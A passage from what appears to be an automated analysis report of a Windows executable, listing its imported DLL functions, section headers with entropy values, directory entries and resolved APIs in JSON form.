1247. {
1248. "name": "CreateICA",
1249. "address": "0x46f460"
1250. },
1251. {
1252. "name": "CreateHalftonePalette",
1253. "address": "0x46f464"
1254. },
1255. {
1256. "name": "CreateFontIndirectA",
1257. "address": "0x46f468"
1258. },
1259. {
1260. "name": "CreateEnhMetaFileA",
1261. "address": "0x46f46c"
1262. },
1263. {
1264. "name": "CreateDIBitmap",
1265. "address": "0x46f470"
1266. },
1267. {
1268. "name": "CreateDIBSection",
1269. "address": "0x46f474"
1270. },
1271. {
1272. "name": "CreateDCA",
1273. "address": "0x46f478"
1274. },
1275. {
1276. "name": "CreateCompatibleDC",
1277. "address": "0x46f47c"
1278. },
1279. {
1280. "name": "CreateCompatibleBitmap",
1281. "address": "0x46f480"
1282. },
1283. {
1284. "name": "CreateBrushIndirect",
1285. "address": "0x46f484"
1286. },
1287. {
1288. "name": "CreateBitmap",
1289. "address": "0x46f488"
1290. },
1291. {
1292. "name": "CopyEnhMetaFileA",
1293. "address": "0x46f48c"
1294. },
1295. {
1296. "name": "CloseEnhMetaFile",
1297. "address": "0x46f490"
1298. },
1299. {
1300. "name": "BitBlt",
1301. "address": "0x46f494"
1302. }
1303. ],
1304. "dll": "gdi32.dll"
1305. },
1306. {
1307. "imports": [
1308. {
1309. "name": "CreateWindowExA",
1310. "address": "0x46f49c"
1311. },
1312. {
1313. "name": "WindowFromPoint",
1314. "address": "0x46f4a0"
1315. },
1316. {
1317. "name": "WinHelpA",
1318. "address": "0x46f4a4"
1319. },
1320. {
1321. "name": "WaitMessage",
1322. "address": "0x46f4a8"
1323. },
1324. {
1325. "name": "UpdateWindow",
1326. "address": "0x46f4ac"
1327. },
1328. {
1329. "name": "UnregisterClassA",
1330. "address": "0x46f4b0"
1331. },
1332. {
1333. "name": "UnhookWindowsHookEx",
1334. "address": "0x46f4b4"
1335. },
1336. {
1337. "name": "TranslateMessage",
1338. "address": "0x46f4b8"
1339. },
1340. {
1341. "name": "TranslateMDISysAccel",
1342. "address": "0x46f4bc"
1343. },
1344. {
1345. "name": "TrackPopupMenu",
1346. "address": "0x46f4c0"
1347. },
1348. {
1349. "name": "SystemParametersInfoA",
1350. "address": "0x46f4c4"
1351. },
1352. {
1353. "name": "ShowWindow",
1354. "address": "0x46f4c8"
1355. },
1356. {
1357. "name": "ShowScrollBar",
1358. "address": "0x46f4cc"
1359. },
1360. {
1361. "name": "ShowOwnedPopups",
1362. "address": "0x46f4d0"
1363. },
1364. {
1365. "name": "ShowCursor",
1366. "address": "0x46f4d4"
1367. },
1368. {
1369. "name": "SetWindowsHookExA",
1370. "address": "0x46f4d8"
1371. },
1372. {
1373. "name": "SetWindowTextA",
1374. "address": "0x46f4dc"
1375. },
1376. {
1377. "name": "SetWindowPos",
1378. "address": "0x46f4e0"
1379. },
1380. {
1381. "name": "SetWindowPlacement",
1382. "address": "0x46f4e4"
1383. },
1384. {
1385. "name": "SetWindowLongA",
1386. "address": "0x46f4e8"
1387. },
1388. {
1389. "name": "SetTimer",
1390. "address": "0x46f4ec"
1391. },
1392. {
1393. "name": "SetScrollRange",
1394. "address": "0x46f4f0"
1395. },
1396. {
1397. "name": "SetScrollPos",
1398. "address": "0x46f4f4"
1399. },
1400. {
1401. "name": "SetScrollInfo",
1402. "address": "0x46f4f8"
1403. },
1404. {
1405. "name": "SetRect",
1406. "address": "0x46f4fc"
1407. },
1408. {
1409. "name": "SetPropA",
1410. "address": "0x46f500"
1411. },
1412. {
1413. "name": "SetParent",
1414. "address": "0x46f504"
1415. },
1416. {
1417. "name": "SetMenuItemInfoA",
1418. "address": "0x46f508"
1419. },
1420. {
1421. "name": "SetMenu",
1422. "address": "0x46f50c"
1423. },
1424. {
1425. "name": "SetKeyboardState",
1426. "address": "0x46f510"
1427. },
1428. {
1429. "name": "SetForegroundWindow",
1430. "address": "0x46f514"
1431. },
1432. {
1433. "name": "SetFocus",
1434. "address": "0x46f518"
1435. },
1436. {
1437. "name": "SetCursor",
1438. "address": "0x46f51c"
1439. },
1440. {
1441. "name": "SetClipboardData",
1442. "address": "0x46f520"
1443. },
1444. {
1445. "name": "SetClassLongA",
1446. "address": "0x46f524"
1447. },
1448. {
1449. "name": "SetCapture",
1450. "address": "0x46f528"
1451. },
1452. {
1453. "name": "SetActiveWindow",
1454. "address": "0x46f52c"
1455. },
1456. {
1457. "name": "SendMessageA",
1458. "address": "0x46f530"
1459. },
1460. {
1461. "name": "ScrollWindow",
1462. "address": "0x46f534"
1463. },
1464. {
1465. "name": "ScreenToClient",
1466. "address": "0x46f538"
1467. },
1468. {
1469. "name": "RemovePropA",
1470. "address": "0x46f53c"
1471. },
1472. {
1473. "name": "RemoveMenu",
1474. "address": "0x46f540"
1475. },
1476. {
1477. "name": "ReleaseDC",
1478. "address": "0x46f544"
1479. },
1480. {
1481. "name": "ReleaseCapture",
1482. "address": "0x46f548"
1483. },
1484. {
1485. "name": "RegisterWindowMessageA",
1486. "address": "0x46f54c"
1487. },
1488. {
1489. "name": "RegisterClipboardFormatA",
1490. "address": "0x46f550"
1491. },
1492. {
1493. "name": "RegisterClassA",
1494. "address": "0x46f554"
1495. },
1496. {
1497. "name": "RedrawWindow",
1498. "address": "0x46f558"
1499. },
1500. {
1501. "name": "PtInRect",
1502. "address": "0x46f55c"
1503. },
1504. {
1505. "name": "PostQuitMessage",
1506. "address": "0x46f560"
1507. },
1508. {
1509. "name": "PostMessageA",
1510. "address": "0x46f564"
1511. },
1512. {
1513. "name": "PeekMessageA",
1514. "address": "0x46f568"
1515. },
1516. {
1517. "name": "OpenClipboard",
1518. "address": "0x46f56c"
1519. },
1520. {
1521. "name": "OffsetRect",
1522. "address": "0x46f570"
1523. },
1524. {
1525. "name": "OemToCharA",
1526. "address": "0x46f574"
1527. },
1528. {
1529. "name": "MessageBoxA",
1530. "address": "0x46f578"
1531. },
1532. {
1533. "name": "MessageBeep",
1534. "address": "0x46f57c"
1535. },
1536. {
1537. "name": "MapWindowPoints",
1538. "address": "0x46f580"
1539. },
1540. {
1541. "name": "MapVirtualKeyA",
1542. "address": "0x46f584"
1543. },
1544. {
1545. "name": "LoadStringA",
1546. "address": "0x46f588"
1547. },
1548. {
1549. "name": "LoadKeyboardLayoutA",
1550. "address": "0x46f58c"
1551. },
1552. {
1553. "name": "LoadIconA",
1554. "address": "0x46f590"
1555. },
1556. {
1557. "name": "LoadCursorA",
1558. "address": "0x46f594"
1559. },
1560. {
1561. "name": "LoadBitmapA",
1562. "address": "0x46f598"
1563. },
1564. {
1565. "name": "KillTimer",
1566. "address": "0x46f59c"
1567. },
1568. {
1569. "name": "IsZoomed",
1570. "address": "0x46f5a0"
1571. },
1572. {
1573. "name": "IsWindowVisible",
1574. "address": "0x46f5a4"
1575. },
1576. {
1577. "name": "IsWindowEnabled",
1578. "address": "0x46f5a8"
1579. },
1580. {
1581. "name": "IsWindow",
1582. "address": "0x46f5ac"
1583. },
1584. {
1585. "name": "IsRectEmpty",
1586. "address": "0x46f5b0"
1587. },
1588. {
1589. "name": "IsIconic",
1590. "address": "0x46f5b4"
1591. },
1592. {
1593. "name": "IsDialogMessageA",
1594. "address": "0x46f5b8"
1595. },
1596. {
1597. "name": "IsChild",
1598. "address": "0x46f5bc"
1599. },
1600. {
1601. "name": "IsCharAlphaNumericA",
1602. "address": "0x46f5c0"
1603. },
1604. {
1605. "name": "IsCharAlphaA",
1606. "address": "0x46f5c4"
1607. },
1608. {
1609. "name": "InvalidateRect",
1610. "address": "0x46f5c8"
1611. },
1612. {
1613. "name": "IntersectRect",
1614. "address": "0x46f5cc"
1615. },
1616. {
1617. "name": "InsertMenuItemA",
1618. "address": "0x46f5d0"
1619. },
1620. {
1621. "name": "InsertMenuA",
1622. "address": "0x46f5d4"
1623. },
1624. {
1625. "name": "InflateRect",
1626. "address": "0x46f5d8"
1627. },
1628. {
1629. "name": "GetWindowThreadProcessId",
1630. "address": "0x46f5dc"
1631. },
1632. {
1633. "name": "GetWindowTextA",
1634. "address": "0x46f5e0"
1635. },
1636. {
1637. "name": "GetWindowRect",
1638. "address": "0x46f5e4"
1639. },
1640. {
1641. "name": "GetWindowPlacement",
1642. "address": "0x46f5e8"
1643. },
1644. {
1645. "name": "GetWindowLongA",
1646. "address": "0x46f5ec"
1647. },
1648. {
1649. "name": "GetWindowDC",
1650. "address": "0x46f5f0"
1651. },
1652. {
1653. "name": "GetTopWindow",
1654. "address": "0x46f5f4"
1655. },
1656. {
1657. "name": "GetSystemMetrics",
1658. "address": "0x46f5f8"
1659. },
1660. {
1661. "name": "GetSystemMenu",
1662. "address": "0x46f5fc"
1663. },
1664. {
1665. "name": "GetSysColorBrush",
1666. "address": "0x46f600"
1667. },
1668. {
1669. "name": "GetSysColor",
1670. "address": "0x46f604"
1671. },
1672. {
1673. "name": "GetSubMenu",
1674. "address": "0x46f608"
1675. },
1676. {
1677. "name": "GetScrollRange",
1678. "address": "0x46f60c"
1679. },
1680. {
1681. "name": "GetScrollPos",
1682. "address": "0x46f610"
1683. },
1684. {
1685. "name": "GetScrollInfo",
1686. "address": "0x46f614"
1687. },
1688. {
1689. "name": "GetPropA",
1690. "address": "0x46f618"
1691. },
1692. {
1693. "name": "GetParent",
1694. "address": "0x46f61c"
1695. },
1696. {
1697. "name": "GetWindow",
1698. "address": "0x46f620"
1699. },
1700. {
1701. "name": "GetMessageTime",
1702. "address": "0x46f624"
1703. },
1704. {
1705. "name": "GetMenuStringA",
1706. "address": "0x46f628"
1707. },
1708. {
1709. "name": "GetMenuState",
1710. "address": "0x46f62c"
1711. },
1712. {
1713. "name": "GetMenuItemInfoA",
1714. "address": "0x46f630"
1715. },
1716. {
1717. "name": "GetMenuItemID",
1718. "address": "0x46f634"
1719. },
1720. {
1721. "name": "GetMenuItemCount",
1722. "address": "0x46f638"
1723. },
1724. {
1725. "name": "GetMenu",
1726. "address": "0x46f63c"
1727. },
1728. {
1729. "name": "GetLastActivePopup",
1730. "address": "0x46f640"
1731. },
1732. {
1733. "name": "GetKeyboardState",
1734. "address": "0x46f644"
1735. },
1736. {
1737. "name": "GetKeyboardLayoutList",
1738. "address": "0x46f648"
1739. },
1740. {
1741. "name": "GetKeyboardLayout",
1742. "address": "0x46f64c"
1743. },
1744. {
1745. "name": "GetKeyState",
1746. "address": "0x46f650"
1747. },
1748. {
1749. "name": "GetKeyNameTextA",
1750. "address": "0x46f654"
1751. },
1752. {
1753. "name": "GetIconInfo",
1754. "address": "0x46f658"
1755. },
1756. {
1757. "name": "GetForegroundWindow",
1758. "address": "0x46f65c"
1759. },
1760. {
1761. "name": "GetFocus",
1762. "address": "0x46f660"
1763. },
1764. {
1765. "name": "GetDesktopWindow",
1766. "address": "0x46f664"
1767. },
1768. {
1769. "name": "GetDCEx",
1770. "address": "0x46f668"
1771. },
1772. {
1773. "name": "GetDC",
1774. "address": "0x46f66c"
1775. },
1776. {
1777. "name": "GetCursorPos",
1778. "address": "0x46f670"
1779. },
1780. {
1781. "name": "GetCursor",
1782. "address": "0x46f674"
1783. },
1784. {
1785. "name": "GetClipboardData",
1786. "address": "0x46f678"
1787. },
1788. {
1789. "name": "GetClientRect",
1790. "address": "0x46f67c"
1791. },
1792. {
1793. "name": "GetClassNameA",
1794. "address": "0x46f680"
1795. },
1796. {
1797. "name": "GetClassInfoA",
1798. "address": "0x46f684"
1799. },
1800. {
1801. "name": "GetCapture",
1802. "address": "0x46f688"
1803. },
1804. {
1805. "name": "GetActiveWindow",
1806. "address": "0x46f68c"
1807. },
1808. {
1809. "name": "FrameRect",
1810. "address": "0x46f690"
1811. },
1812. {
1813. "name": "FindWindowA",
1814. "address": "0x46f694"
1815. },
1816. {
1817. "name": "FillRect",
1818. "address": "0x46f698"
1819. },
1820. {
1821. "name": "EqualRect",
1822. "address": "0x46f69c"
1823. },
1824. {
1825. "name": "EnumWindows",
1826. "address": "0x46f6a0"
1827. },
1828. {
1829. "name": "EnumThreadWindows",
1830. "address": "0x46f6a4"
1831. },
1832. {
1833. "name": "EnumClipboardFormats",
1834. "address": "0x46f6a8"
1835. },
1836. {
1837. "name": "EndPaint",
1838. "address": "0x46f6ac"
1839. },
1840. {
1841. "name": "EndDeferWindowPos",
1842. "address": "0x46f6b0"
1843. },
1844. {
1845. "name": "EnableWindow",
1846. "address": "0x46f6b4"
1847. },
1848. {
1849. "name": "EnableScrollBar",
1850. "address": "0x46f6b8"
1851. },
1852. {
1853. "name": "EnableMenuItem",
1854. "address": "0x46f6bc"
1855. },
1856. {
1857. "name": "EmptyClipboard",
1858. "address": "0x46f6c0"
1859. },
1860. {
1861. "name": "DrawTextA",
1862. "address": "0x46f6c4"
1863. },
1864. {
1865. "name": "DrawMenuBar",
1866. "address": "0x46f6c8"
1867. },
1868. {
1869. "name": "DrawIconEx",
1870. "address": "0x46f6cc"
1871. },
1872. {
1873. "name": "DrawIcon",
1874. "address": "0x46f6d0"
1875. },
1876. {
1877. "name": "DrawFrameControl",
1878. "address": "0x46f6d4"
1879. },
1880. {
1881. "name": "DrawEdge",
1882. "address": "0x46f6d8"
1883. },
1884. {
1885. "name": "DispatchMessageA",
1886. "address": "0x46f6dc"
1887. },
1888. {
1889. "name": "DestroyWindow",
1890. "address": "0x46f6e0"
1891. },
1892. {
1893. "name": "DestroyMenu",
1894. "address": "0x46f6e4"
1895. },
1896. {
1897. "name": "DestroyIcon",
1898. "address": "0x46f6e8"
1899. },
1900. {
1901. "name": "DestroyCursor",
1902. "address": "0x46f6ec"
1903. },
1904. {
1905. "name": "DeleteMenu",
1906. "address": "0x46f6f0"
1907. },
1908. {
1909. "name": "DeferWindowPos",
1910. "address": "0x46f6f4"
1911. },
1912. {
1913. "name": "DefWindowProcA",
1914. "address": "0x46f6f8"
1915. },
1916. {
1917. "name": "DefMDIChildProcA",
1918. "address": "0x46f6fc"
1919. },
1920. {
1921. "name": "DefFrameProcA",
1922. "address": "0x46f700"
1923. },
1924. {
1925. "name": "CreatePopupMenu",
1926. "address": "0x46f704"
1927. },
1928. {
1929. "name": "CreateMenu",
1930. "address": "0x46f708"
1931. },
1932. {
1933. "name": "CreateIcon",
1934. "address": "0x46f70c"
1935. },
1936. {
1937. "name": "CloseClipboard",
1938. "address": "0x46f710"
1939. },
1940. {
1941. "name": "ClientToScreen",
1942. "address": "0x46f714"
1943. },
1944. {
1945. "name": "CheckMenuItem",
1946. "address": "0x46f718"
1947. },
1948. {
1949. "name": "CallWindowProcA",
1950. "address": "0x46f71c"
1951. },
1952. {
1953. "name": "CallNextHookEx",
1954. "address": "0x46f720"
1955. },
1956. {
1957. "name": "BeginPaint",
1958. "address": "0x46f724"
1959. },
1960. {
1961. "name": "BeginDeferWindowPos",
1962. "address": "0x46f728"
1963. },
1964. {
1965. "name": "CharNextA",
1966. "address": "0x46f72c"
1967. },
1968. {
1969. "name": "CharLowerBuffA",
1970. "address": "0x46f730"
1971. },
1972. {
1973. "name": "CharLowerA",
1974. "address": "0x46f734"
1975. },
1976. {
1977. "name": "CharUpperBuffA",
1978. "address": "0x46f738"
1979. },
1980. {
1981. "name": "CharToOemA",
1982. "address": "0x46f73c"
1983. },
1984. {
1985. "name": "AdjustWindowRectEx",
1986. "address": "0x46f740"
1987. },
1988. {
1989. "name": "ActivateKeyboardLayout",
1990. "address": "0x46f744"
1991. }
1992. ],
1993. "dll": "user32.dll"
1994. },
1995. {
1996. "imports": [
1997. {
1998. "name": "Sleep",
1999. "address": "0x46f74c"
2000. }
2001. ],
2002. "dll": "kernel32.dll"
2003. },
2004. {
2005. "imports": [
2006. {
2007. "name": "SafeArrayPtrOfIndex",
2008. "address": "0x46f754"
2009. },
2010. {
2011. "name": "SafeArrayGetUBound",
2012. "address": "0x46f758"
2013. },
2014. {
2015. "name": "SafeArrayGetLBound",
2016. "address": "0x46f75c"
2017. },
2018. {
2019. "name": "SafeArrayCreate",
2020. "address": "0x46f760"
2021. },
2022. {
2023. "name": "VariantChangeType",
2024. "address": "0x46f764"
2025. },
2026. {
2027. "name": "VariantCopy",
2028. "address": "0x46f768"
2029. },
2030. {
2031. "name": "VariantClear",
2032. "address": "0x46f76c"
2033. },
2034. {
2035. "name": "VariantInit",
2036. "address": "0x46f770"
2037. }
2038. ],
2039. "dll": "oleaut32.dll"
2040. },
2041. {
2042. "imports": [
2043. {
2044. "name": "CreateStreamOnHGlobal",
2045. "address": "0x46f778"
2046. },
2047. {
2048. "name": "IsAccelerator",
2049. "address": "0x46f77c"
2050. },
2051. {
2052. "name": "OleDraw",
2053. "address": "0x46f780"
2054. },
2055. {
2056. "name": "OleSetMenuDescriptor",
2057. "address": "0x46f784"
2058. },
2059. {
2060. "name": "CoTaskMemFree",
2061. "address": "0x46f788"
2062. },
2063. {
2064. "name": "ProgIDFromCLSID",
2065. "address": "0x46f78c"
2066. },
2067. {
2068. "name": "StringFromCLSID",
2069. "address": "0x46f790"
2070. },
2071. {
2072. "name": "CoCreateInstance",
2073. "address": "0x46f794"
2074. },
2075. {
2076. "name": "CoGetClassObject",
2077. "address": "0x46f798"
2078. },
2079. {
2080. "name": "CoUninitialize",
2081. "address": "0x46f79c"
2082. },
2083. {
2084. "name": "CoInitialize",
2085. "address": "0x46f7a0"
2086. },
2087. {
2088. "name": "IsEqualGUID",
2089. "address": "0x46f7a4"
2090. }
2091. ],
2092. "dll": "ole32.dll"
2093. },
2094. {
2095. "imports": [
2096. {
2097. "name": "GetErrorInfo",
2098. "address": "0x46f7ac"
2099. },
2100. {
2101. "name": "GetActiveObject",
2102. "address": "0x46f7b0"
2103. },
2104. {
2105. "name": "SysFreeString",
2106. "address": "0x46f7b4"
2107. }
2108. ],
2109. "dll": "oleaut32.dll"
2110. },
2111. {
2112. "imports": [
2113. {
2114. "name": "ImageList_SetIconSize",
2115. "address": "0x46f7bc"
2116. },
2117. {
2118. "name": "ImageList_GetIconSize",
2119. "address": "0x46f7c0"
2120. },
2121. {
2122. "name": "ImageList_Write",
2123. "address": "0x46f7c4"
2124. },
2125. {
2126. "name": "ImageList_Read",
2127. "address": "0x46f7c8"
2128. },
2129. {
2130. "name": "ImageList_GetDragImage",
2131. "address": "0x46f7cc"
2132. },
2133. {
2134. "name": "ImageList_DragShowNolock",
2135. "address": "0x46f7d0"
2136. },
2137. {
2138. "name": "ImageList_SetDragCursorImage",
2139. "address": "0x46f7d4"
2140. },
2141. {
2142. "name": "ImageList_DragMove",
2143. "address": "0x46f7d8"
2144. },
2145. {
2146. "name": "ImageList_DragLeave",
2147. "address": "0x46f7dc"
2148. },
2149. {
2150. "name": "ImageList_DragEnter",
2151. "address": "0x46f7e0"
2152. },
2153. {
2154. "name": "ImageList_EndDrag",
2155. "address": "0x46f7e4"
2156. },
2157. {
2158. "name": "ImageList_BeginDrag",
2159. "address": "0x46f7e8"
2160. },
2161. {
2162. "name": "ImageList_Remove",
2163. "address": "0x46f7ec"
2164. },
2165. {
2166. "name": "ImageList_DrawEx",
2167. "address": "0x46f7f0"
2168. },
2169. {
2170. "name": "ImageList_Draw",
2171. "address": "0x46f7f4"
2172. },
2173. {
2174. "name": "ImageList_GetBkColor",
2175. "address": "0x46f7f8"
2176. },
2177. {
2178. "name": "ImageList_SetBkColor",
2179. "address": "0x46f7fc"
2180. },
2181. {
2182. "name": "ImageList_ReplaceIcon",
2183. "address": "0x46f800"
2184. },
2185. {
2186. "name": "ImageList_Add",
2187. "address": "0x46f804"
2188. },
2189. {
2190. "name": "ImageList_GetImageCount",
2191. "address": "0x46f808"
2192. },
2193. {
2194. "name": "ImageList_Destroy",
2195. "address": "0x46f80c"
2196. },
2197. {
2198. "name": "ImageList_Create",
2199. "address": "0x46f810"
2200. }
2201. ],
2202. "dll": "comctl32.dll"
2203. },
2204. {
2205. "imports": [
2206. {
2207. "name": "OpenPrinterA",
2208. "address": "0x46f818"
2209. },
2210. {
2211. "name": "EnumPrintersA",
2212. "address": "0x46f81c"
2213. },
2214. {
2215. "name": "DocumentPropertiesA",
2216. "address": "0x46f820"
2217. },
2218. {
2219. "name": "ClosePrinter",
2220. "address": "0x46f824"
2221. }
2222. ],
2223. "dll": "winspool.drv"
2224. },
2225. {
2226. "imports": [
2227. {
2228. "name": "PrintDlgA",
2229. "address": "0x46f82c"
2230. }
2231. ],
2232. "dll": "comdlg32.dll"
2233. }
2234. ],
2235. "digital_signers": null,
2236. "exported_dll_name": null,
2237. "actual_checksum": "0x000d4802",
2238. "overlay": null,
2239. "imagebase": "0x00400000",
2240. "reported_checksum": "0x00000000",
2241. "icon_hash": null,
2242. "entrypoint": "0x0046304c",
2243. "timestamp": "1992-05-28 01:25:48",
2244. "osversion": "4.0",
2245. "sections": [
2246. {
2247. "name": "CODE",
2248. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
2249. "virtual_address": "0x00001000",
2250. "size_of_data": "0x00062200",
2251. "entropy": "6.54",
2252. "raw_address": "0x00000400",
2253. "virtual_size": "0x00062094",
2254. "characteristics_raw": "0x60000020"
2255. },
2256. {
2257. "name": "DATA",
2258. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2259. "virtual_address": "0x00064000",
2260. "size_of_data": "0x00009600",
2261. "entropy": "4.97",
2262. "raw_address": "0x00062600",
2263. "virtual_size": "0x00009528",
2264. "characteristics_raw": "0xc0000040"
2265. },
2266. {
2267. "name": "BSS",
2268. "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2269. "virtual_address": "0x0006e000",
2270. "size_of_data": "0x00000000",
2271. "entropy": "0.00",
2272. "raw_address": "0x0006bc00",
2273. "virtual_size": "0x00000d59",
2274. "characteristics_raw": "0xc0000000"
2275. },
2276. {
2277. "name": ".idata",
2278. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2279. "virtual_address": "0x0006f000",
2280. "size_of_data": "0x00002600",
2281. "entropy": "5.01",
2282. "raw_address": "0x0006bc00",
2283. "virtual_size": "0x00002540",
2284. "characteristics_raw": "0xc0000040"
2285. },
2286. {
2287. "name": ".tls",
2288. "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2289. "virtual_address": "0x00072000",
2290. "size_of_data": "0x00000000",
2291. "entropy": "0.00",
2292. "raw_address": "0x0006e200",
2293. "virtual_size": "0x00000010",
2294. "characteristics_raw": "0xc0000000"
2295. },
2296. {
2297. "name": ".rdata",
2298. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
2299. "virtual_address": "0x00073000",
2300. "size_of_data": "0x00000200",
2301. "entropy": "0.21",
2302. "raw_address": "0x0006e200",
2303. "virtual_size": "0x00000018",
2304. "characteristics_raw": "0x50000040"
2305. },
2306. {
2307. "name": ".reloc",
2308. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
2309. "virtual_address": "0x00074000",
2310. "size_of_data": "0x00007200",
2311. "entropy": "6.67",
2312. "raw_address": "0x0006e400",
2313. "virtual_size": "0x00007108",
2314. "characteristics_raw": "0x50000040"
2315. },
2316. {
2317. "name": ".rsrc",
2318. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
2319. "virtual_address": "0x0007c000",
2320. "size_of_data": "0x00059200",
2321. "entropy": "7.49",
2322. "raw_address": "0x00075600",
2323. "virtual_size": "0x0005900c",
2324. "characteristics_raw": "0x50000040"
2325. }
2326. ],
2327. "resources": [],
2328. "dirents": [
2329. {
2330. "virtual_address": "0x00000000",
2331. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
2332. "size": "0x00000000"
2333. },
2334. {
2335. "virtual_address": "0x0006f000",
2336. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
2337. "size": "0x00002540"
2338. },
2339. {
2340. "virtual_address": "0x0007c000",
2341. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
2342. "size": "0x0005900c"
2343. },
2344. {
2345. "virtual_address": "0x00000000",
2346. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
2347. "size": "0x00000000"
2348. },
2349. {
2350. "virtual_address": "0x00000000",
2351. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
2352. "size": "0x00000000"
2353. },
2354. {
2355. "virtual_address": "0x00074000",
2356. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
2357. "size": "0x00007108"
2358. },
2359. {
2360. "virtual_address": "0x00000000",
2361. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
2362. "size": "0x00000000"
2363. },
2364. {
2365. "virtual_address": "0x00000000",
2366. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
2367. "size": "0x00000000"
2368. },
2369. {
2370. "virtual_address": "0x00000000",
2371. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
2372. "size": "0x00000000"
2373. },
2374. {
2375. "virtual_address": "0x00073000",
2376. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
2377. "size": "0x00000018"
2378. },
2379. {
2380. "virtual_address": "0x00000000",
2381. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
2382. "size": "0x00000000"
2383. },
2384. {
2385. "virtual_address": "0x00000000",
2386. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
2387. "size": "0x00000000"
2388. },
2389. {
2390. "virtual_address": "0x00000000",
2391. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
2392. "size": "0x00000000"
2393. },
2394. {
2395. "virtual_address": "0x00000000",
2396. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
2397. "size": "0x00000000"
2398. },
2399. {
2400. "virtual_address": "0x00000000",
2401. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
2402. "size": "0x00000000"
2403. },
2404. {
2405. "virtual_address": "0x00000000",
2406. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
2407. "size": "0x00000000"
2408. }
2409. ],
2410. "exports": [],
2411. "guest_signers": {},
2412. "imphash": "46116a2f8090728368dbf9ef96584273",
2413. "icon_fuzzy": null,
2414. "icon": null,
2415. "pdbpath": null,
2416. "imported_dll_count": 17,
2417. "versioninfo": []
2418. }
2419. }
2420.  
2421. [*] Resolved APIs: [
2422. "kernel32.dll.GetDiskFreeSpaceExA",
2423. "oleaut32.dll.VariantChangeTypeEx",
2424. "oleaut32.dll.VarNeg",
2425. "oleaut32.dll.VarNot",
2426. "oleaut32.dll.VarAdd",
2427. "oleaut32.dll.VarSub",
2428. "oleaut32.dll.VarMul",
2429. "oleaut32.dll.VarDiv",
2430. "oleaut32.dll.VarIdiv",
2431. "oleaut32.dll.VarMod",
2432. "oleaut32.dll.VarAnd",
2433. "oleaut32.dll.VarOr",
2434. "oleaut32.dll.VarXor",
2435. "oleaut32.dll.VarCmp",
2436. "oleaut32.dll.VarI4FromStr",
2437. "oleaut32.dll.VarR4FromStr",
2438. "oleaut32.dll.VarR8FromStr",
2439. "oleaut32.dll.VarDateFromStr",
2440. "oleaut32.dll.VarCyFromStr",
2441. "oleaut32.dll.VarBoolFromStr",
2442. "oleaut32.dll.VarBstrFromCy",
2443. "oleaut32.dll.VarBstrFromDate",
2444. "oleaut32.dll.VarBstrFromBool",
2445. "user32.dll.GetMonitorInfoA",
2446. "user32.dll.GetSystemMetrics",
2447. "user32.dll.EnumDisplayMonitors",
2448. "dwmapi.dll.DwmIsCompositionEnabled",
2449. "gdi32.dll.GetLayout",
2450. "gdi32.dll.GdiRealizationInfo",
2451. "gdi32.dll.FontIsLinked",
2452. "advapi32.dll.RegOpenKeyExW",
2453. "advapi32.dll.RegQueryInfoKeyW",
2454. "gdi32.dll.GetTextFaceAliasW",
2455. "advapi32.dll.RegEnumValueW",
2456. "advapi32.dll.RegCloseKey",
2457. "advapi32.dll.RegQueryValueExW",
2458. "gdi32.dll.GetFontAssocStatus",
2459. "advapi32.dll.RegQueryValueExA",
2460. "advapi32.dll.RegEnumKeyExW",
2461. "gdi32.dll.GdiIsMetaPrintDC",
2462. "user32.dll.AnimateWindow",
2463. "comctl32.dll.InitializeFlatSB",
2464. "comctl32.dll.UninitializeFlatSB",
2465. "comctl32.dll.FlatSB_GetScrollProp",
2466. "comctl32.dll.FlatSB_SetScrollProp",
2467. "comctl32.dll.FlatSB_EnableScrollBar",
2468. "comctl32.dll.FlatSB_ShowScrollBar",
2469. "comctl32.dll.FlatSB_GetScrollRange",
2470. "comctl32.dll.FlatSB_GetScrollInfo",
2471. "comctl32.dll.FlatSB_GetScrollPos",
2472. "comctl32.dll.FlatSB_SetScrollPos",
2473. "comctl32.dll.FlatSB_SetScrollInfo",
2474. "comctl32.dll.FlatSB_SetScrollRange",
2475. "user32.dll.SetLayeredWindowAttributes",
2476. "ole32.dll.CoCreateInstanceEx",
2477. "ole32.dll.CoInitializeEx",
2478. "ole32.dll.CoAddRefServerProcess",
2479. "ole32.dll.CoReleaseServerProcess",
2480. "ole32.dll.CoResumeClassObjects",
2481. "ole32.dll.CoSuspendClassObjects",
2482. "olepro32.dll.OleCreatePropertyFrame",
2483. "olepro32.dll.OleCreateFontIndirect",
2484. "olepro32.dll.OleCreatePictureIndirect",
2485. "olepro32.dll.OleLoadPicture",
2486. "kernel32.dll.GetModuleHandleW",
2487. "kernel32.dll.VirtualFree",
2488. "kernel32.dll.LoadLibraryW",
2489. "kernel32.dll.SizeofResource",
